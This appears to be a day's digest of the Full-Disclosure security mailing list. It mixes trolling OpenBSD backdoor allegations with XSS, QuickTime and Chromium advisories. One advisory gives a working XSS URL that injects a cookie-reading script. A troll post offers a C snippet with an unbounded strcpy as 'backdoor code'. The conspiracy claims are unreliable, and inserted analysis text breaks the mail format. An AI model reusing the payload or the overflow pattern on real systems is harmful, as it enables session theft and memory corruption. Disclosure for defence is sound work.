[Full-disclosure] Fw: Re: OpenBSD joins Checkpoint, NSA, Verint and ATT

2010-12-17 Thread Dave Nett
Musnt live L.T.,

I has to come there to reveal what OpenBSD really stands for.
It has be very ironically :

OpenBSD = Open Backdoored Software Distribution

I used to work the a secret agency and I has to tell that that is really the 
kindles of hint they like to leave behind.

However if I appreciate your investigation work of musnt live, I do know who 
you really has be and that has embarassment for the OSS community.
I has not reavel now whose you has be, but I maybe has change of mind letter.
Because I has sure that your own code has also backdoors like there are bugs in 
microsoft.

Grettings.


--- On Fri, 12/17/10, musnt live musntl...@gmail.com wrote:

From: musnt live musntl...@gmail.com
Subject: [Full-disclosure] OpenBSD joins Checkpoint, NSA, Verint and ATT
To: full-disclosure@lists.grok.org.uk
Date: Friday, December 17, 2010, 12:15 AM

As musntlive theorized a cooperative collaberation between NSA and FBI
musnt been used to backdoor and deliver predefined payloads: The
project involved was the GSA Technical Support Center, a circa
1999 joint research and development project between the FBI and the
NSA; the technologies we developed were Multi Level Security controls
for case collaboration between the NSA and the FBI due to the Posse
Commitatus Act

Is we see ATT + Narus + NSA and is we turn stupid eye: ATT is would
never tap the United States!
http://www.wired.com/science/discoveries/news/2006/04/70619

Is we see collusion from OpenBSD + FBI + NSA and we hear Theo: Is not me

Is Americans really stupid to believe is not happen?

We hear that US attorneys is was also backdoored. Is Americans too
high on Theo to believe is this not true: a statically keyed VPN
system used at 235+ US Attorney locations and which later proved to
have been backdoored by the FBI so that they could recover
(potentially) grand jury information from various US
Attorney sites across the United States and abroad.

Is Perry say: The person I reported to at EOSUA was Zal Azmi, who was
later appointed to Chief Information Officer of the FBI by George W.
Bush

Is Azmi say: As former FBI CIO Zal Azmi says, “There have been a
number of government cybersecurity plans put forward over the last
several years… When it comes to cybersecurity, the time for talk is
over and the time for action is way overdue…policies and procedures
have been talked to death.”68
(http://www.afcea.org/signal/articles/templates/SIGNAL_Article_Template.asp?articleid=2167zoneid=280)

Is we to remember, Checkpoint was backdoored, and is US (FBI, DOJ,
DEA, etc) have all phone taps before
(http://www.coffinman.co.uk/an_israeli_trojan_horse.htm)
http://archives.neohapsis.com/archives/firewalls/2000-q4/2514.html

So we is think:

US DOJ - pwneruski
US DEA - pwneruski
US FBI - pwneruski
Internet in US - Narus + ATT - pwneruski
US District Attorneys - pwneruski
OpenBSD - advocates and Theo nuthuggers (Schmehl, etc.) say NO PWNERUSKI

And this is because? OpenBSD is would never sell out? musntlive laugh at marvel

Donot is worry those in America. Is not like your President isn't
looking to backdoor everything
http://boingboing.net/2010/09/27/obama-administration.html

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/









  



[Full-disclosure] OpenBSD has OpenBackdouredSoftwareDistribution

2010-12-17 Thread Dave Nett
Deer List,

Everything has in the title. I has to be a secret agent in the past so I know 
the project code.

Use with awarenes.




Re: [Full-disclosure] OpenBSD has OpenBackdouredSoftwareDistribution

2010-12-17 Thread Dave Nett
Jerome,

Has you know of lexical fingerprinting? Those has used by agencies to recognize 
agents.
So has I change my English to mask my identity. If not could has been hints for 
them to find and arrest me.


--- On Fri, 12/17/10, Jerome Athias jerome.ath...@ja-psi.fr wrote:

From: Jerome Athias jerome.ath...@ja-psi.fr
Subject: Re: [Full-disclosure] OpenBSD has OpenBackdouredSoftwareDistribution
To: Dave Nett dave.n...@yahoo.com
Cc: full-disclosure@lists.grok.org.uk
Date: Friday, December 17, 2010, 10:32 AM

I hope, dear, that the code is better than your english.

On 17/12/2010 08:26, Dave Nett wrote:
> Deer List,
>
> Everything has in the title. I has to be a secret agent in the past so I
> know the project code.
>
> Use with awarenes.




Re: [Full-disclosure] OpenBSD has OpenBackdouredSoftwareDistribution

2010-12-17 Thread Jerome Athias
I hope, dear, that the code is better than your english.

On 17/12/2010 08:26, Dave Nett wrote:
> Deer List,
>
> Everything has in the title. I has to be a secret agent in the past so I
> know the project code.
>
> Use with awarenes.

[Full-disclosure] www.eVuln.com : titl, url - Non-persistent XSS in Social Share

2010-12-17 Thread Aliaksandr Hartsuyeu
www.eVuln.com advisory:
title and url - Non-persistent XSS in Social Share
Summary: http://evuln.com/vulns/164/summary.html 
Details: http://evuln.com/vulns/164/description.html 

---Summary---
eVuln ID: EV0164
Software: Social Share
Vendor: n/a
Version: 2010-06-05
Critical Level: low
Type: Cross Site Scripting
Status: Unpatched. No reply from developer(s)
PoC: Available
Solution: Not available
Discovered by: Aliaksandr Hartsuyeu ( http://evuln.com/ )

---Description---
It is possible to inject xss code into title and url parameters in
save.php script.
Parameters title, url are not properly sanitized before being used
in HTML code.

---PoC/Exploit---
PoC code is available at:
http://evuln.com/vulns/164/exploit.html

---Solution---
Not available

---Credit---
Vulnerability discovered by Aliaksandr Hartsuyeu
http://evuln.com/code-analysis.html - source code review service



[Full-disclosure] www.eVuln.com : link and linkdescription XSS in Social Share

2010-12-17 Thread Aliaksandr Hartsuyeu
www.eVuln.com advisory:
link and linkdescription XSS in Social Share
Summary: http://evuln.com/vulns/165/summary.html 
Details: http://evuln.com/vulns/165/description.html 

---Summary---
eVuln ID: EV0165
Software: Social Share
Vendor: n/a
Version: 2010-06-05
Critical Level: low
Type: Cross Site Scripting
Status: Unpatched. No reply from developer(s)
PoC: Available
Solution: Not available
Discovered by: Aliaksandr Hartsuyeu ( http://evuln.com/ )

---Description---
It is possible to inject xss code into link and linkdescription
parameters in processPost.php script.
Parameters link and linkdescription are not properly sanitized
before being used in HTML code.

---PoC/Exploit---
PoC code is available at:
http://evuln.com/vulns/165/exploit.html

---Solution---
Not available

---Credit---
Vulnerability discovered by Aliaksandr Hartsuyeu
http://evuln.com/penetration-test.html - penetration testing service




Re: [Full-disclosure] OpenBSD has OpenBackdouredSoftwareDistribution

2010-12-17 Thread Dave Nett
Hre has the code that some guys at the fbi has search :

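#include <stdio.h>
#include <string.h>

int ikedfl(char *ibf);

int isakmp (char *keysvc[])
{
    char pbuff[512] = "";
    if (ikedfl(pbuff)) {
        printf("VPN connected!\n");
    }
    return 0;
}

int ikedfl(char *ibf)
{
    /* buffer is not declared in the posted code; this size is an assumption */
    char buffer[64];
    /* if pbuff has is 71 111 100 32 66 108 101 115 115 32 116 104 101 32 85
    110 105 116 101 100 32 83 116 97 116 101 115 32 111 102 32 65 109 101 114 105
    99 97
    { */
    /* unbounded copy, as posted; the post passes ibf[1], which is a char
       and not a pointer, so the address of that element is used here */
    strcpy(buffer, &ibf[1]);
    return 0;
    /* TO DO */
}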

It is code in the early stage that I managed to take out, but real code has 
inside BSD has ciphered polymorphic version that much harder to detect. Though 
don'tk know if in actual code.

--- On Fri, 12/17/10, Thiago Silva dead...@archlinux.com.br wrote:

From: Thiago Silva dead...@archlinux.com.br
Subject: Re: [Full-disclosure] OpenBSD has OpenBackdouredSoftwareDistribution
To: Dave Nett dave.n...@yahoo.com
Date: Friday, December 17, 2010, 11:49 AM

hmm very smart..

2010/12/17 Dave Nett dave.n...@yahoo.com


Jerome,

Has you know of lexical fingerprinting? Those has used by agencies to recognize 
agents.
So has I change my English to mask my identity. If not could has been hints for 
them to find and arrest me.




--- On Fri, 12/17/10, Jerome Athias jerome.ath...@ja-psi.fr wrote:



From: Jerome Athias jerome.ath...@ja-psi.fr
Subject: Re: [Full-disclosure] OpenBSD has OpenBackdouredSoftwareDistribution
To: Dave Nett dave.n...@yahoo.com


Cc: full-disclosure@lists.grok.org.uk
Date: Friday, December 17, 2010, 10:32 AM

I hope, dear, that the code is better than your english.



On 17/12/2010 08:26, Dave Nett wrote:
> Deer List,
>
> Everything has in the title. I has to be a secret agent in the past so I
> know the project code.
>
> Use with awarenes.









  



-- 
Thiago Silva
PGP Fingerprint: 5AD6 970A DF12 9828 56E5  0F13 363B 8373 BF73 A463


-- 
The secret to creativity is knowing how to hide your sources. --- Albert 
Einstein





Re: [Full-disclosure] OpenBSD joins Checkpoint, NSA, Verint and ATT

2010-12-17 Thread Rob Hughes
n3td3v? That you?

The check point thing was a red herring. DoD was given source code access for 
an audit and found no problems. The second link supports the finding that there 
never was a back door in check point.


 
> Is we to remember, Checkpoint was backdoored, and is US (FBI, DOJ,
> DEA, etc) have all phone taps before
> (http://www.coffinman.co.uk/an_israeli_trojan_horse.htm)
> http://archives.neohapsis.com/archives/firewalls/2000-q4/2514.html
 



[Full-disclosure] [ GLSA 201012-01 ] Chromium: Multiple vulnerabilities

2010-12-17 Thread Tobias Heinlein
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 201012-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Chromium: Multiple vulnerabilities
      Date: December 17, 2010
      Bugs: #325451, #326717, #330003, #333559, #335750, #338204,
            #341797, #344201, #347625, #348651
        ID: 201012-01

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple vulnerabilities have been reported in Chromium, some of which
may allow user-assisted execution of arbitrary code.

Background
==========

Chromium is an open-source web browser project.

Affected packages
=================

    -------------------------------------------------------------------
     Package               /  Vulnerable  /                 Unaffected
    -------------------------------------------------------------------
  1  www-client/chromium     < 8.0.552.224              >= 8.0.552.224

Description
===========

Multiple vulnerabilities were found in Chromium. For further
information please consult the release notes referenced below.

Impact
======

A remote attacker could trick a user to perform a set of UI actions
that trigger a possibly exploitable crash, leading to execution of
arbitrary code or a Denial of Service.

It was also possible for an attacker to entice a user to visit a
specially-crafted web page that would trigger one of the
vulnerabilities, leading to execution of arbitrary code within the
confines of the sandbox, successful Cross-Site Scripting attacks,
violation of the same-origin policy, successful website spoofing
attacks, information leak, or a Denial of Service. An attacker could
also trick a user to perform a set of UI actions that might result in a
successful website spoofing attack.

Multiple bugs in the sandbox could result in a sandbox escape.

Multiple UI bugs could lead to information leak and successful website
spoofing attacks.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Chromium users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=www-client/chromium-8.0.552.224"

References
==========

  [ 1 ] Release Notes 5.0.375.86
        http://googlechromereleases.blogspot.com/2010/06/stable-channel-update_24.html
  [ 2 ] Release Notes 5.0.375.99
        http://googlechromereleases.blogspot.com/2010/07/stable-channel-update.html
  [ 3 ] Release Notes 5.0.375.125
        http://googlechromereleases.blogspot.com/2010/07/stable-channel-update_26.html
  [ 4 ] Release Notes 5.0.375.127
        http://googlechromereleases.blogspot.com/2010/08/stable-channel-update_19.html
  [ 5 ] Release Notes 6.0.472.59
        http://googlechromereleases.blogspot.com/2010/09/stable-beta-channel-updates_14.html
  [ 6 ] Release Notes 6.0.472.62
        http://googlechromereleases.blogspot.com/2010/09/stable-beta-channel-updates_17.html
  [ 7 ] Release Notes 7.0.517.41
        http://googlechromereleases.blogspot.com/2010/10/stable-channel-update.html
  [ 8 ] Release Notes 7.0.517.44
        http://googlechromereleases.blogspot.com/2010/11/stable-channel-update.html
  [ 9 ] Release Notes 8.0.552.215
        http://googlechromereleases.blogspot.com/2010/12/stable-beta-channel-updates.html
  [ 10 ] Release Notes 8.0.552.224
        http://googlechromereleases.blogspot.com/2010/12/stable-beta-channel-updates_13.html

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-201012-01.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
secur...@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.

License
=======

Copyright 2010 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5




[Full-disclosure] OpenIBDS (OpenBSD is Backdoor Detection System) tool

2010-12-17 Thread Григорий Братислава
Hello full-disclosure!!!

I want to warn you about **potential** problem in is with OpenBSD and
backdoor so I make is for you:
OpeniBDS - OpenBSD is Backdoor Detection System) with BSD license to reuse.


#!/usr/bin/perl -p
# openibds.pl (OpenBSD is Backdoor Detection System)
# Copyright (c) 2011, Григорий Братислава

# is usage:

# cd /usr/src/sys/crypto
# perl pwneruski.pl crypto* | grep pelcgbc | tail -n 1

# is you see pelcgbc then is you has backdoor

# Is tested on OpenBSD, Linux, BeOS

# All rights reserved.

# Redistribution is and use in source and binary forms, is with or
# without modification,
# are permitted is provided that the following conditions are met:

# Redistributions of is source code must retain the above copyright
# notice, this list is
# of conditions and the following disclaimer.

# Redistributions in binary form must reproduce the above copyright
# notice, this is list
# is of conditions and is the following disclaimer in the
# documentation and/or other
# materials provided with the distribution.

# Neither the name of the Григорий Братислава nor the names of its
# contributors may be
# used to endorse or promote products derived from this software
# without specific prior
# written permission.

# THIS SOFTWARE IS IS PROVIDED BY THE COPYRIGHT HOLDERS AND
# CONTRIBUTORS AS IS IS AND
# IS ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# IS THE IMPLIED
# WARRANTIES IS OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED.
# IN IS NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT,
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT
# NOT IS LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
# OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY
# OF LIABILITY,
# WHETHER IN IS CONTRACT, STRICT IS LIABILITY, OR IS TORT (INCLUDING
# NEGLIGENCE OR
# OTHERWISE) ARISING IN IS ANY WAY OUT OF THE IS USE OF THIS SOFTWARE,
# EVEN IF IS ADVISED
# OF THE POSSIBILITY OF SUCH DAMAGE.



# @a holds one XOR mask per letter (13 bytes repeated twice); the
# substitution below replaces every ASCII letter and keeps its case.
BEGIN { @a = split //, "/-35753=?=357"x2; }
s.([a-zA-Z]).ord $1<97?uc($1^$a[ord($1)-65]):lc($1^$a[ord($1)-97]).ge;#is_pwneruski


[Full-disclosure] OpenIBDS version 2.0

2010-12-17 Thread Григорий Братислава
Hello full disclosure!!!

I is like to update is list as BSD license is no for this application.
I is also fix high level encryption decryption to detect is backdoor.


#!/usr/bin/perl -p
# openibds.pl OpeniBDS (OpenBSD is Backdoor Detection System v.2)
# Copyright (c) 2011, Григорий Братислава

# Is author of this code is Григорий Братислава
# musntl...@gmail.com

# Permission is to use, copy, and is modify this software with or
# without fee is hereby granted

# perl pwneruski.pl crypto* | awk '/pnyyonpx/{print $6,$7}' | perl pwneruski.pl | sed -n '10p' || echo no backdoor


# $OpenIBDS: openibds.pl,v 2 2010/12/17

# @a holds one XOR mask per letter (13 bytes repeated twice); the
# substitution below replaces every ASCII letter and keeps its case.
BEGIN { @a = split //, "/-35753=?=357"x2; }
s.([a-zA-Z]).ord $1<97?uc($1^$a[ord($1)-65]):lc($1^$a[ord($1)-97]).ge;


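What the one-liner in the two OpenIBDS posts above computes, as an added Python example that is not code from either post: the XOR table is a 13-character string repeated twice, which makes the substitution plain ROT13, so the strings the usage lines grep for are ROT13 of ordinary identifiers. The function names and the sample lines are constructed for this illustration.

```python
"""Analysis of the substitution performed by the openibds.pl one-liner.

Added example, not code from the posts. It mirrors the Perl expression
    ord $1 < 97 ? uc($1 ^ $a[ord($1)-65]) : lc($1 ^ $a[ord($1)-97])
with @a = split //, "/-35753=?=357" x 2.
"""
import codecs
import string

# 13 bytes repeated twice: one XOR mask per letter of the alphabet.
XOR_TABLE = "/-35753=?=357" * 2


def openibds_transform(text):
    """Apply the script's per-letter XOR substitution to a string."""
    out = []
    for ch in text:
        if ch not in string.ascii_letters:      # Perl class [a-zA-Z] only
            out.append(ch)
            continue
        is_upper = ord(ch) < 97
        index = ord(ch) - (65 if is_upper else 97)
        mixed = chr(ord(ch) ^ ord(XOR_TABLE[index]))
        # Every mask has bit 0x20 set, so the XOR flips the letter's case;
        # the script restores it with uc()/lc().
        out.append(mixed.upper() if is_upper else mixed.lower())
    return "".join(out)


def table_is_rot13():
    """True if the substitution equals ROT13 for every ASCII letter."""
    letters = string.ascii_letters
    return openibds_transform(letters) == codecs.encode(letters, "rot_13")


def v1_flags(lines):
    """Emulate `perl pwneruski.pl FILES | grep pelcgbc` from the first post:
    return the input lines whose transformed form contains the marker."""
    return [ln for ln in lines if "pelcgbc" in openibds_transform(ln)]


# Constructed sample input, not taken from any real source tree.
SAMPLE_LINES = [
    "struct cryptop *crp;",
    "int add(int a, int b) { return a + b; }",
]

if __name__ == "__main__":
    print("table is ROT13:", table_is_rot13())
    for marker in ("pelcgbc", "pnyyonpx"):
        print(marker, "->", openibds_transform(marker))
    print("flagged:", v1_flags(SAMPLE_LINES))
```

The "detection" in the first post therefore fires on any input line that contains the string the marker decodes to, whatever the file does.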
[Full-disclosure] New vulnerabilities in eSitesBuilder

2010-12-17 Thread MustLive
Hello Full-Disclosure!

I want to warn you about new vulnerabilities in eSitesBuilder. It's
Ukrainian commercial CMS (which is used particularly for online shops).

SecurityVulns ID: 11310.

-------------------------
Affected products:
-------------------------

Vulnerable are possibly all versions of eSitesBuilder.

----------
Details:
----------

XSS (WASC-08):

http://site/console/forget.php?e_mail=%3Cscript%3Ealert(document.cookie)%3C/script%3Eseenform=y

Insufficient Anti-automation (WASC-21):

http://site/console/forget.php

At this page there is no protection against automated requests (captcha).

Abuse of Functionality (WASC-42):

http://site/console/forget.php

Via this functionality it's possible to enumerate logins of the users.


------------
Timeline:
------------

2010.10.08 - announced at my site.
2010.10.08 - informed developers.
2010.12.16 - disclosed at my site.

I mentioned these vulnerabilities at my site
(http://websecurity.com.ua/4588/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 




Re: [Full-disclosure] Allegations regarding OpenBSD IPSEC

2010-12-17 Thread Paul Schmehl
--On December 16, 2010 7:47:36 PM -0500 Larry Seltzer 
la...@larryseltzer.com wrote:

> Instead of an overt back-door, is it possible that Theo's old friend (;))
> is referring to exploitable vulnerabilities. These vulnerabilities may or
> may not have been found in the interim and fixed, but not recognized as
> backdoors.
>
> As you said, it's impossible to prove a negative (prove to me that you
> haven't read Moby Dick), but the scenario above sounds kind of reasonable
> to me.


If you work in security (I mean professionally - dealing day to day with 
the problems that arise - not the wannabes who post to lists and act like 
know-it-alls), you quickly learn to cast a jaundiced eye on unsubstantiated 
claims made on the internet.  You begin to ask, what is the poster's 
motive?  What's the goal of publicizing this?  What is he not saying?

In the case of Mr. Perry, he has made claims that have proven to be untrue 
(or at least been categorically denied by the persons supposedly involved), 
and he has thrown out some big names as if those substantiate his claims. 
(Shades of the common trait of internet myths.)

The one thing Mr. Perry has not done, and which, if his claims have any 
merit at all, he could easily do, since he claims he's no longer under NDA, 
is post the code that proves that there is a backdoor.  After all, he 
supposedly wrote it, along with others.  He must know precisely what and 
where it is.  At a minimum he could say that Theo needs to closely audit 
netif.h or crypto.c or des_setkey.c or something similar.

So why hasn't he posted the code?  I can think of some plausible reasons. 
(There may be others.)  Perhaps he wants to create FUD around OpenBSD for 
some reason.  (Note to musnt live: I don't use OpenBSD.  If you had a clue 
how to read mail headers you would know that or if you had the simple 
skills to do a Google search, you would know that I'm a port maintainer for 
FreeBSD.  Oh, I've installed and run OpenBSD in the past.  But I haven't 
used it in years.  And I don't give a hoot about it or about Theo, one way 
or the other.  And the thought of smelling his crotch has never once 
crossed my mind - but it did yours - which leads to some interesting 
questions about your proclivities.)

Perhaps he wants to gain some notoriety.  He's certainly done that.

Perhaps he really doesn't know anything at all about a backdoor and is 
simply blowing smoke.

Perhaps he is aware of rumors about a backdoor but has no proof and is 
hoping Theo will do the hard work of auditing the code for him.

Perhaps he thinks there's a backdoor but he hasn't the coding skills to 
confirm it or even to audit the code.

Only Mr. Perry knows the truth.  But one thing is certain.  He could easily 
end the controversy if he wanted to but he hasn't.  And that says a great 
deal more about him and his motives than it does about the integrity of the 
OpenBSD code or the possibility of a backdoor existing in it.

The fact that I have to write all this irritates me.  It's a waste of my 
time.  But that's the price you pay for being on the internet, which 
abounds with idiots who will swallow every wild and unsubstantiated claim 
without question and who live in a world of paranoia where Big Brother is 
always right around the corner.

-- 
Paul Schmehl, Senior Infosec Analyst
As if it wasn't already obvious, my opinions
are my own and not those of my employer.
***
It is as useless to argue with those who have
renounced the use of reason as to administer
medication to the dead. Thomas Jefferson
There are some ideas so wrong that only a very
intelligent person could believe in them. George Orwell



Re: [Full-disclosure] Allegations regarding OpenBSD IPSEC

2010-12-17 Thread Larry Seltzer
> The one thing Mr. Perry has not done, and which, if his claims have any
> merit at all, he could easily do, since he claims he's no longer under NDA,
> is post the code that proves that there is a backdoor.  After all, he
> supposedly wrote it, along with others.

Actually, he did not say that he wrote code. He said that Jason
Wright and several other developers were responsible for those
backdoors

-Original Message-
From: Paul Schmehl [mailto:pschmehl_li...@tx.rr.com]
Sent: Friday, December 17, 2010 12:12 PM
To: Larry Seltzer; full-disclosure@lists.grok.org.uk
Subject: RE: [Full-disclosure] Allegations regarding OpenBSD IPSEC

--On December 16, 2010 7:47:36 PM -0500 Larry Seltzer
la...@larryseltzer.com wrote:

> Instead of an overt back-door, is it possible that Theo's old friend (;))
> is referring to exploitable vulnerabilities. These vulnerabilities may or
> may not have been found in the interim and fixed, but not recognized as
> backdoors.
>
> As you said, it's impossible to prove a negative (prove to me that you
> haven't read Moby Dick), but the scenario above sounds kind of reasonable
> to me.


If you work in security (I mean professionally - dealing day to day with
the problems that arise - not the wannabes who post to lists and act like
know-it-alls), you quickly learn to cast a jaundiced eye on
unsubstantiated
claims made on the internet.  You begin to ask, what is the poster's
motive?  What's the goal of publicizing this?  What is he not saying?

In the case of Mr. Perry, he has made claims that have proven to be untrue

(or at least been categorically denied by the persons supposedly
involved),
and he has thrown out some big names as if those substantiate his claims.
(Shades of the common trait of internet myths.)

The one thing Mr. Perry has not done, and which, if his claims have any
merit at all, he could easily do, since he claims he's no longer under
NDA,
is post the code that proves that there is a backdoor.  After all, he
supposedly wrote it, along with others.  He must know precisely what and
where it is.  At a minimum he could say that Theo needs to closely audit
netif.h or crypto.c or des_setkey.c or something similar.

So why hasn't he posted the code?  I can think of some plausible reasons.
(There may be others.)  Perhaps he wants to create FUD around OpenBSD for
some reason.  (Note to musnt live: I don't use OpenBSD.  If you had a clue

how to read mail headers you would know that or if you had the simple
skills to do a Google search, you would know that I'm a port maintainer
for
FreeBSD.  Oh, I've installed and run OpenBSD in the past.  But I haven't
used it in years.  And I don't give a hoot about it or about Theo, one way

or the other.  And the thought of smelling his crotch has never once
crossed my mind - but it did yours - which leads to some interesting
questions about your proclivities.)

Perhaps he wants to gain some notoriety.  He's certainly done that.

Perhaps he really doesn't know anything at all about a backdoor and is
simply blowing smoke.

Perhaps he is aware of rumors about a backdoor but has no proof and is
hoping Theo will do the hard work of auditing the code for him.

Perhaps he thinks there's a backdoor but he hasn't the coding skills to
confirm it or even to audit the code.

Only Mr. Perry knows the truth.  But one thing is certain.  He could
easily
end the controversy if he wanted to but he hasn't.  And that says a great
deal more about him and his motives than it does about the integrity of
the
OpenBSD code or the possibility of a backdoor existing in it.

The fact that I have to write all this irritates me.  It's a waste of my
time.  But that's the price you pay for being on the internet, which
abounds with idiots who will swallow every wild and unsubstantiated claim
without question and who live in a world of paranoia where Big Brother is
always right around the corner.

-- 
Paul Schmehl, Senior Infosec Analyst
As if it wasn't already obvious, my opinions
are my own and not those of my employer.
***
It is as useless to argue with those who have
renounced the use of reason as to administer
medication to the dead. Thomas Jefferson
There are some ideas so wrong that only a very
intelligent person could believe in them. George Orwell



[Full-disclosure] Apple Quicktime Memory Corruption - CVE-2010-3801

2010-12-17 Thread Rodrigo Branco
Dear List,

I'm writing on behalf of the Check Point Vulnerability Discovery Team to 
publish the following vulnerability.



Check Point Software Technologies - Vulnerability Discovery Team (VDT)
http://www.checkpoint.com/defense/

Apple Quicktime Memory Corruption when parsing FPX files
CVE-2010-3801


INTRODUCTION

Apple Quicktime is a powerful media technology that works on Mac and PC
with just about every popular video or audio format you come across. So
you can play the digital media you want to play.

Apple Quicktime is available as plugin to different browsers, and thus
the vulnerability can be remotely triggered.

QuickTime player does not properly parse .fpx media files, which causes
a memory corruption by opening a malformed file with an invalid value
located in PoC repro.fpx at offset 0x49.

This problem was confirmed in the following versions of Apple Quicktime
and browsers, other versions may be also affected.

QuickTime Player version 7.6.8 (1675) in all Operating Systems
QuickTime Player version 7.6.6 (1671) in all Operating Systems

CVSS Scoring System

The CVSS score is: 9
Base Score: 10
Temporal Score: 9
We used the following values to calculate the scores:
Base score is: AV:N/AC:L/Au:N/C:C/I:C/A:C
Temporal score is: E:POC/RL:U/RC:C


TRIGGERING THE PROBLEM

The problem is triggered by PoC repro.fpx which causes invalid memory
access in all the referred versions and is available to interested
parties only.


DETAILS


Disassembly:

668E2387   F7C7 03000000    TEST EDI,3
668E238D   75 15            JNZ SHORT QuickT_1.668E23A4
668E238F   C1E9 02          SHR ECX,2
668E2392   83E2 03          AND EDX,3
668E2395   83F9 08          CMP ECX,8
668E2398   72 2A            JB SHORT QuickT_1.668E23C4
668E239A   F3:A5            REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]   - Crash Here

EDI = 0x089A0020
ESI = 0x61626364

(3e8.e3c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.

eax=61626560 ebx=00000000 ecx=0000007f edx=00000000 esi=61626364 edi=06d80020
eip=668e239a esp=0012dfbc ebp=0012dfc4 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206

668e239a f3a5            rep movs dword ptr es:[edi],dword ptr [esi]

0:000> !exploitable
Exploitability Classification: PROBABLY_EXPLOITABLE
Recommended Bug Title: Probably Exploitable - Read Access Violation on Block
Data Move starting at QuickTime!CallComponentFunctionWithStorage+0x0003f20a
(Hash=0x4b1e3917.0x4f031b17)
This is a read access violation in a block data move, and is therefore
classified as probably exploitable.


CREDITS

This vulnerability was discovered and researched by Rodrigo Rubira Branco from 
Check Point Vulnerability Discovery Team (VDT).





Rodrigo Rubira Branco
Senior Security Researcher
Vulnerability Discovery Team (VDT)
Check Point Software Technologies
http://www.checkpoint.com/defense


Re: [Full-disclosure] Allegations regarding OpenBSD IPSEC

2010-12-17 Thread Григорий Братислава

> The one thing Mr. Perry has not done, and which, if his claims have any
> merit at all, he could easily do, since he claims he's no longer under NDA,
> is post the code that proves that there is a backdoor.  After all, he
> supposedly wrote it, along with others.  He must know precisely what and
> where it is.  At a minimum he could say that Theo needs to closely audit
> netif.h or crypto.c or des_setkey.c or something similar.


Is you confuse expired NDA of him as a person (Perry) than him hasing
capability to publish this code if is he do has it. But you no is read
he is not say he make code.


 So why hasn't he posted the code?  I can think of some plausible reasons.
 (There may be others.)  Perhaps he wants to create FUD around OpenBSD for
 some reason.  (Note to musnt live: I don't use OpenBSD.  If you had a clue
 how to read mail headers you would know that or if you had the simple
 skills to do a Google search, you would know that I'm a port maintainer for
 FreeBSD.  Oh, I've installed and run OpenBSD in the past.  But I haven't
 used it in years.  And I don't give a hoot about it or about Theo, one way
 or the other.  And the thought of smelling his crotch has never once
 crossed my mind - but it did yours - which leads to some interesting
 questions about your proclivities.)


Is you believe he could still has code and release proof without
getting is into trouble. No. Is he release code and say: here is code
for proof so then Без перевода like you can is say: this is no
proof, you is making this up is this no is paradox to you?

SCENARIO 1
Schmehl: Prove it
Perry: Is here is code!!!
Schmehl: You is make this up!!!

SCENARIO 2
Schmehl: Prove it
Perry: I is no have code :*(
Schmehl: You is make this up!!!


 The fact that I have to write all this irritates me.  It's a waste of my
 time.  But that's the price you pay for being on the internet, which
 abounds with idiots who will swallow every wild and unsubstantiated claim
 without question and who live in a world of paranoia where Big Brother is
 always right around the corner.


Is no one asking you for is your expertease Mr. Schmehl, is in fact we
say is you need retire back to мошонка sniffing


[Full-disclosure] Embedded Video WordPress Plugin Cross Site Vulnerability (XSS) - CVE-2010-4277

2010-12-17 Thread Rodrigo Branco
Dear List,

I'm writing on behalf of the Check Point Vulnerability Discovery Team to 
publish the following vulnerability.




Check Point Software Technologies - Vulnerability Discovery Team (VDT)
http://www.checkpoint.com/defense/

Embedded Video WordPress Plugin Cross Site Scripting Vulnerability
CVE-2010-4277


INTRODUCTION

Embedded Video is a WordPress Plugin created by Jovel Stefan to easily embed 
videos in blog posts.  The videos can be uploaded to the web server
or come from external portals (like YouTube, Google Video and others).  Links 
to the video on the video portal or for download of the video can be
automatically generated as well.  The linktext is also configurable 
individually. Furthermore a fixed prefix for the linktext can be determined. 
The videos can be integrated easily by using the built-in WYSIWYG editor.  The 
plugin has a Cross Site Script (XSS) vulnerability.

This problem was confirmed in the latest version of the plugin, other versions 
may also be affected.  

The developer of the plugin replied to the advisory in a very responsible and 
fast manner, but unfortunately, there will be no updates due to the fact that 
this plugin is not maintained anymore.


CVSS Scoring System

The CVSS score is: 6.4
Base Score: 6.7
Temporal Score: 6.4
We used the following values to calculate the scores:
Base score is: AV:N/AC:L/Au:N/C:C/I:C/A:N
Temporal score is: E:F/RL:U/RC:C


DETAILS

The file lembedded-video.php does not sanitize the content variable; it is 
possible to inject malformed data via JavaScript.

Code affected:

function embeddedvideo_plugin($content) {
    $output = preg_replace_callback(REGEXP_1, 'embeddedvideo_plugin_callback', $content);
